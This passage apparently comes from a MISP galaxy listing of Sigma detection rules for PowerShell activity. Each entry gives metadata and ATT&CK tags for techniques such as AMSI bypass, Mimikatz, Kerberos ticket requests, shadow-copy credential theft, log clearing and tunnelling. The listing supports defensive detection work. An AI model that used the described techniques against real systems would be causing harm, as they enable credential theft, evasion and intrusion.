
Internal MISP references

UUID e6cb92b4-b470-4eb8-8a9d-d63e8583aae0 which can be used as unique global reference for Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2020/10/18
falsepositive ['Unknown']
filename posh_ps_invoke_obfuscation_via_rundll.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Potential PowerShell Obfuscation Using Alias Cmdlets

Detects Set-Alias or New-Alias cmdlet usage. Which can be use as a mean to obfuscate PowerShell scripts

Internal MISP references

UUID 96cd126d-f970-49c4-848a-da3a09f55c55 which can be used as unique global reference for Potential PowerShell Obfuscation Using Alias Cmdlets in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/01/08
falsepositive ['Unknown']
filename posh_ps_susp_set_alias.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1027', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious New-PSDrive to Admin Share

Adversaries may use to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.

Internal MISP references

UUID 1c563233-030e-4a07-af8c-ee0490a66d3a which can be used as unique global reference for Suspicious New-PSDrive to Admin Share in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/13
falsepositive ['Unknown']
filename posh_ps_susp_new_psdrive.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

Request A Single Ticket via PowerShell

utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer. This behavior is typically used during a kerberos or silver ticket attack. A successful execution will output the SPNs for the endpoint in question.

Internal MISP references

UUID a861d835-af37-4930-bcd6-5b178bfb54df which can be used as unique global reference for Request A Single Ticket via PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/28
falsepositive ['Unknown']
filename posh_ps_request_kerberos_ticket.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.credential_access', 'attack.t1558.003']
Related clusters

To see the related clusters, click here.

NTFS Alternate Data Stream

Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.

Internal MISP references

UUID 8c521530-5169-495d-a199-0a3a881ad24e which can be used as unique global reference for NTFS Alternate Data Stream in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sami Ruohonen
creation_date 2018/07/24
falsepositive ['Unknown']
filename posh_ps_ntfs_ads_access.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.004', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Get-ADUser Enumeration Using UserAccountControl Flags

Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.

Internal MISP references

UUID 96c982fe-3d08-4df4-bed2-eb14e02f21c8 which can be used as unique global reference for Get-ADUser Enumeration Using UserAccountControl Flags in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/03/17
falsepositive ['Legitimate PowerShell scripts']
filename posh_ps_as_rep_roasting.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1033']
Related clusters

To see the related clusters, click here.

Powershell Create Scheduled Task

Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code

Internal MISP references

UUID 363eccc0-279a-4ccf-a3ab-24c2e63b11fb which can be used as unique global reference for Powershell Create Scheduled Task in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/28
falsepositive ['Unknown']
filename posh_ps_cmdlet_scheduled_task.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.persistence', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

Powershell Timestomp

Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.

Internal MISP references

UUID c6438007-e081-42ce-9483-b067fbef33c3 which can be used as unique global reference for Powershell Timestomp in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/08/03
falsepositive ['Legitimate admin script']
filename posh_ps_timestomp.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.006']
Related clusters

To see the related clusters, click here.

PowerShell PSAttack

Detects the use of PSAttack PowerShell hack tool

Internal MISP references

UUID b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5 which can be used as unique global reference for PowerShell PSAttack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sean Metcalf (source), Florian Roth (Nextron Systems)
creation_date 2017/03/05
falsepositive ['Unknown']
filename posh_ps_psattack.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious Hyper-V Cmdlets

Adversaries may carry out malicious operations using a virtual instance to avoid detection

Internal MISP references

UUID 42d36aa1-3240-4db0-8257-e0118dcdd9cd which can be used as unique global reference for Suspicious Hyper-V Cmdlets in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/04/09
falsepositive ['Legitimate PowerShell scripts']
filename posh_ps_susp_hyper_v_condlet.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.006']
Related clusters

To see the related clusters, click here.

Service Registry Permissions Weakness Check

Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services

Internal MISP references

UUID 95afc12e-3cbb-40c3-9340-84a032e596a3 which can be used as unique global reference for Service Registry Permissions Weakness Check in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/30
falsepositive ['Legitimate administrative script']
filename posh_ps_get_acl_service.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.persistence', 'attack.t1574.011', 'stp.2a']
Related clusters

To see the related clusters, click here.

Create Volume Shadow Copy with Powershell

Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information

Internal MISP references

UUID afd12fed-b0ec-45c9-a13d-aa86625dac81 which can be used as unique global reference for Create Volume Shadow Copy with Powershell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/12
falsepositive ['Legitimate PowerShell scripts']
filename posh_ps_create_volume_shadow_copy.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.003']
Related clusters

To see the related clusters, click here.

Veeam Backup Servers Credential Dumping Script Execution

Detects execution of a PowerShell script that contains calls to the "Veeam.Backup" class, in order to dump stored credentials.

Internal MISP references

UUID 976d6e6f-a04b-4900-9713-0134a353e38b which can be used as unique global reference for Veeam Backup Servers Credential Dumping Script Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/04
falsepositive ['Administrators backup scripts (must be investigated)']
filename posh_ps_veeam_credential_dumping_script.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.credential_access']

Enable Windows Remote Management

Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.

Internal MISP references

UUID 991a9744-f2f0-44f2-bd33-9092eba17dc3 which can be used as unique global reference for Enable Windows Remote Management in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/07
falsepositive ['Legitimate script']
filename posh_ps_enable_psremoting.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.006']
Related clusters

To see the related clusters, click here.

Suspicious PowerShell Mailbox SMTP Forward Rule

Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule.

Internal MISP references

UUID 15b7abbb-8b40-4d01-9ee2-b51994b1d474 which can be used as unique global reference for Suspicious PowerShell Mailbox SMTP Forward Rule in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/26
falsepositive ['Legitimate usage of the cmdlet to forward emails']
filename posh_ps_exchange_mailbox_smpt_forwarding_rule.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.exfiltration']

Suspicious Eventlog Clear

Detects usage of known powershell cmdlets such as "Clear-EventLog" to clear the Windows event logs

Internal MISP references

UUID 0f017df3-8f5a-414f-ad6b-24aff1128278 which can be used as unique global reference for Suspicious Eventlog Clear in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/12
falsepositive ["Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate"]
filename posh_ps_susp_clear_eventlog.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.001']
Related clusters

To see the related clusters, click here.

Suspicious Get Information for SMB Share

Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.

Internal MISP references

UUID 95f0643a-ed40-467c-806b-aac9542ec5ab which can be used as unique global reference for Suspicious Get Information for SMB Share in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/15
falsepositive ['Unknown']
filename posh_ps_susp_smb_share_reco.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1069.001']
Related clusters

To see the related clusters, click here.

Suspicious FromBase64String Usage On Gzip Archive - Ps Script

Detects attempts of decoding a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward.

Internal MISP references

UUID df69cb1d-b891-4cd9-90c7-d617d90100ce which can be used as unique global reference for Suspicious FromBase64String Usage On Gzip Archive - Ps Script in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/23
falsepositive ['Legitimate administrative script']
filename posh_ps_frombase64string_archive.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.command_and_control', 'attack.t1132.001']
Related clusters

To see the related clusters, click here.

Malicious ShellIntel PowerShell Commandlets

Detects Commandlet names from ShellIntel exploitation scripts.

Internal MISP references

UUID 402e1e1d-ad59-47b6-bf80-1ee44985b3a7 which can be used as unique global reference for Malicious ShellIntel PowerShell Commandlets in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
creation_date 2021/08/09
falsepositive ['Unknown']
filename posh_ps_shellintel_malicious_commandlets.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

WMIC Unquoted Services Path Lookup - PowerShell

Detects known WMI recon method to look for unquoted service paths, often used by pentest inside of powershell scripts attackers enum scripts

Internal MISP references

UUID 09658312-bc27-4a3b-91c5-e49ab9046d1b which can be used as unique global reference for WMIC Unquoted Services Path Lookup - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/20
falsepositive ['Unknown']
filename posh_ps_wmi_unquoted_service_search.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1047']
Related clusters

To see the related clusters, click here.

Certificate Exported Via PowerShell - ScriptBlock

Detects calls to cmdlets inside of PowerShell scripts that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.

Internal MISP references

UUID aa7a3fce-bef5-4311-9cc1-5f04bb8c308c which can be used as unique global reference for Certificate Exported Via PowerShell - ScriptBlock in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/04/23
falsepositive ['Legitimate certificate exports by administrators. Additional filters might be required.']
filename posh_ps_export_certificate.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.credential_access', 'attack.t1552.004']
Related clusters

To see the related clusters, click here.

PowerShell Script Change Permission Via Set-Acl - PsScript

Detects PowerShell scripts set ACL to of a file or a folder

Internal MISP references

UUID cae80281-ef23-44c5-873b-fd48d2666f49 which can be used as unique global reference for PowerShell Script Change Permission Via Set-Acl - PsScript in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/07/18
falsepositive ['Unknown']
filename posh_ps_set_acl.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1222']
Related clusters

To see the related clusters, click here.

AMSI Bypass Pattern Assembly GetType

Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts

Internal MISP references

UUID e0d6c087-2d1c-47fd-8799-3904103c5a98 which can be used as unique global reference for AMSI Bypass Pattern Assembly GetType in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/11/09
falsepositive ['Unknown']
filename posh_ps_amsi_bypass_pattern_nov22.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001', 'attack.execution']
Related clusters

To see the related clusters, click here.

Suspicious Invoke-Item From Mount-DiskImage

Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.

Internal MISP references

UUID 902cedee-0398-4e3a-8183-6f3a89773a96 which can be used as unique global reference for Suspicious Invoke-Item From Mount-DiskImage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/01
falsepositive ['Legitimate PowerShell scripts']
filename posh_ps_run_from_mount_diskimage.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1553.005']
Related clusters

To see the related clusters, click here.

Security Software Discovery Via Powershell Script

Detects calls to "get-process" where the output is piped to a "where-object" filter to search for security solution processes. Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus

Internal MISP references

UUID 904e8e61-8edf-4350-b59c-b905fc8e810c which can be used as unique global reference for Security Software Discovery Via Powershell Script in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Anish Bogati, Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/12/16
falsepositive ['False positives might occur due to the nature of the ScriptBlock being ingested as a big blob. Initial tuning is required.', 'As the "selection_cmdlet" is common in scripts the matching engine might slow down the search. Change into regex or a more accurate string to avoid heavy resource consumption if experienced']
filename posh_ps_get_process_security_software_discovery.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1518.001']
Related clusters

To see the related clusters, click here.

Powershell Local Email Collection

Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a users local system, such as Outlook storage or cache files.

Internal MISP references

UUID 2837e152-93c8-43d2-85ba-c3cd3c2ae614 which can be used as unique global reference for Powershell Local Email Collection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/07/21
falsepositive ['Unknown']
filename posh_ps_susp_mail_acces.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.collection', 'attack.t1114.001']
Related clusters

To see the related clusters, click here.

Suspicious PowerShell Get Current User

Detects the use of PowerShell to identify the current logged user.

Internal MISP references

UUID 4096a49c-7de4-4da0-a230-c66ccd56ea5a which can be used as unique global reference for Suspicious PowerShell Get Current User in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/04/04
falsepositive ['Legitimate PowerShell scripts']
filename posh_ps_susp_get_current_user.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1033']
Related clusters

To see the related clusters, click here.

User Discovery And Export Via Get-ADUser Cmdlet - PowerShell

Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file

Internal MISP references

UUID c2993223-6da8-4b1a-88ee-668b8bf315e9 which can be used as unique global reference for User Discovery And Export Via Get-ADUser Cmdlet - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/11/17
falsepositive ["Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often"]
filename posh_ps_user_discovery_get_aduser.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1033']
Related clusters

To see the related clusters, click here.

Winlogon Helper DLL

Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[Wow6432Node]Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables.

Internal MISP references

UUID 851c506b-6b7c-4ce2-8802-c703009d03c0 which can be used as unique global reference for Winlogon Helper DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2019/10/21
falsepositive ['Unknown']
filename posh_ps_winlogon_helper_dll.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.persistence', 'attack.t1547.004']
Related clusters

To see the related clusters, click here.

Suspicious Service DACL Modification Via Set-Service Cmdlet - PS

Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)

Internal MISP references

UUID 22d80745-6f2c-46da-826b-77adaededd74 which can be used as unique global reference for Suspicious Service DACL Modification Via Set-Service Cmdlet - PS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/24
falsepositive ['Rare intended use of hidden services', 'Rare FP could occur due to the non linearity of the ScriptBlockText log']
filename posh_ps_susp_service_dacl_modification_set_service.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.011']
Related clusters

To see the related clusters, click here.

Potential Invoke-Mimikatz PowerShell Script

Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.

Internal MISP references

UUID 189e3b02-82b2-4b90-9662-411eb64486d4 which can be used as unique global reference for Potential Invoke-Mimikatz PowerShell Script in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch, Elastic (idea)
creation_date 2022/09/28
falsepositive ['Mimikatz can be useful for testing the security of networks']
filename posh_ps_potential_invoke_mimikatz.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.credential_access', 'attack.t1003']
Related clusters

To see the related clusters, click here.

Troubleshooting Pack Cmdlet Execution

Detects execution of "TroubleshootingPack" cmdlets to leverage CVE-2022-30190 or action similar to "msdt" lolbin (as described in LOLBAS)

Internal MISP references

UUID 03409c93-a7c7-49ba-9a4c-a00badf2a153 which can be used as unique global reference for Troubleshooting Pack Cmdlet Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/21
falsepositive ['Legitimate usage of "TroubleshootingPack" cmdlet for troubleshooting purposes']
filename posh_ps_susp_follina_execution.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Active Directory Computers Enumeration With Get-AdComputer

Detects usage of the "Get-AdComputer" to enumerate Computers or properties within Active Directory.

Internal MISP references

UUID 36bed6b2-e9a0-4fff-beeb-413a92b86138 which can be used as unique global reference for Active Directory Computers Enumeration With Get-AdComputer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/03/17
falsepositive ['Unknown']
filename posh_ps_get_adcomputer.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1018', 'attack.t1087.002']
Related clusters

To see the related clusters, click here.

Detected Windows Software Discovery - PowerShell

Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.

Internal MISP references

UUID 2650dd1a-eb2a-412d-ac36-83f06c4f2282 which can be used as unique global reference for Detected Windows Software Discovery - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/16
falsepositive ['Legitimate administration activities']
filename posh_ps_software_discovery.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1518']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Via Use Clip - Powershell

Detects Obfuscated Powershell via use Clip.exe in Scripts

Internal MISP references

UUID db92dd33-a3ad-49cf-8c2c-608c3e30ace0 which can be used as unique global reference for Invoke-Obfuscation Via Use Clip - Powershell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/09
falsepositive ['Unknown']
filename posh_ps_invoke_obfuscation_via_use_clip.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious Connection to Remote Account

Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism

Internal MISP references

UUID 1883444f-084b-419b-ac62-e0d0c5b3693f which can be used as unique global reference for Suspicious Connection to Remote Account in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/27
falsepositive ['Unknown']
filename posh_ps_susp_networkcredential.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.credential_access', 'attack.t1110.001']
Related clusters

To see the related clusters, click here.

Suspicious Mount-DiskImage

Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.

Internal MISP references

UUID 29e1c216-6408-489d-8a06-ee9d151ef819 which can be used as unique global reference for Suspicious Mount-DiskImage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/01
falsepositive ['Legitimate PowerShell scripts']
filename posh_ps_susp_mount_diskimage.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1553.005']
Related clusters

To see the related clusters, click here.

Potential Suspicious PowerShell Keywords

Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework

Internal MISP references

UUID 1f49f2ab-26bc-48b3-96cc-dcffbc93eadf which can be used as unique global reference for Potential Suspicious PowerShell Keywords in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Perez Diego (@darkquassar), Tuan Le (NCSGroup)
creation_date 2019/02/11
falsepositive ['Unknown']
filename posh_ps_susp_keywords.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Recon Information for Export with PowerShell

Once established within a system or network, an adversary may use automated techniques for collecting internal data

Internal MISP references

UUID a9723fcc-881c-424c-8709-fd61442ab3c3 which can be used as unique global reference for Recon Information for Export with PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/07/30
falsepositive ['Unknown']
filename posh_ps_susp_recon_export.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.collection', 'attack.t1119']
Related clusters

To see the related clusters, click here.

Potential Suspicious Windows Feature Enabled

Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images

Internal MISP references

UUID 55c925c1-7195-426b-a136-a9396800e29b which can be used as unique global reference for Potential Suspicious Windows Feature Enabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/09/10
falsepositive ['Legitimate usage of the features listed in the rule.']
filename posh_ps_enable_susp_windows_optional_feature.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion']

Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy

Detetcts PowerShell activity in which Get-Addefaultdomainpasswordpolicy is used to get the default password policy for an Active Directory domain.

Internal MISP references

UUID bbb9495b-58fc-4016-b9df-9a3a1b67ca82 which can be used as unique global reference for Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/03/17
falsepositive ['Legitimate PowerShell scripts']
filename posh_ps_susp_get_addefaultdomainpasswordpolicy.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1201']
Related clusters

To see the related clusters, click here.

Suspicious Start-Process PassThru

Powershell use PassThru option to start in background

Internal MISP references

UUID 0718cd72-f316-4aa2-988f-838ea8533277 which can be used as unique global reference for Suspicious Start-Process PassThru in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/15
falsepositive ['Legitimate PowerShell scripts']
filename posh_ps_susp_start_process.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036.003']
Related clusters

To see the related clusters, click here.

Remove Account From Domain Admin Group

Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.

Internal MISP references

UUID 48a45d45-8112-416b-8a67-46e03a4b2107 which can be used as unique global reference for Remove Account From Domain Admin Group in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/26
falsepositive ['Unknown']
filename posh_ps_susp_remove_adgroupmember.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.impact', 'attack.t1531']
Related clusters

To see the related clusters, click here.

PowerShell Deleted Mounted Share

Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation

Internal MISP references

UUID 66a4d409-451b-4151-94f4-a55d559c49b0 which can be used as unique global reference for PowerShell Deleted Mounted Share in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, @redcanary, Zach Stanford @svch0st
creation_date 2020/10/08
falsepositive ['Administrators or Power users may remove their shares via cmd line']
filename posh_ps_susp_mounted_share_deletion.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.005']
Related clusters

To see the related clusters, click here.

Suspicious TCP Tunnel Via PowerShell Script

Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity

Internal MISP references

UUID bd33d2aa-497e-4651-9893-5c5364646595 which can be used as unique global reference for Suspicious TCP Tunnel Via PowerShell Script in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/08
falsepositive ['Unknown']
filename posh_ps_susp_proxy_scripts.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.command_and_control', 'attack.t1090']
Related clusters

To see the related clusters, click here.

PowerShell ShellCode

Detects Base64 encoded Shellcode

Internal MISP references

UUID 16b37b70-6fcf-4814-a092-c36bd3aafcbd which can be used as unique global reference for PowerShell ShellCode in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author David Ledbetter (shellcode), Florian Roth (Nextron Systems)
creation_date 2018/11/17
falsepositive ['Unknown']
filename posh_ps_shellcode_b64.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1055', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious Get Local Groups Information - PowerShell

Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.

Internal MISP references

UUID fa6a5a45-3ee2-4529-aa14-ee5edc9e29cb which can be used as unique global reference for Suspicious Get Local Groups Information - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/12
falsepositive ['Unknown']
filename posh_ps_susp_local_group_reco.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1069.001']
Related clusters

To see the related clusters, click here.

Zip A Folder With PowerShell For Staging In Temp - PowerShell Script

Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.

Internal MISP references

UUID b7a3c9a3-09ea-4934-8864-6a32cacd98d9 which can be used as unique global reference for Zip A Folder With PowerShell For Staging In Temp - PowerShell Script in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), frack113
creation_date 2021/07/20
falsepositive ['Unknown']
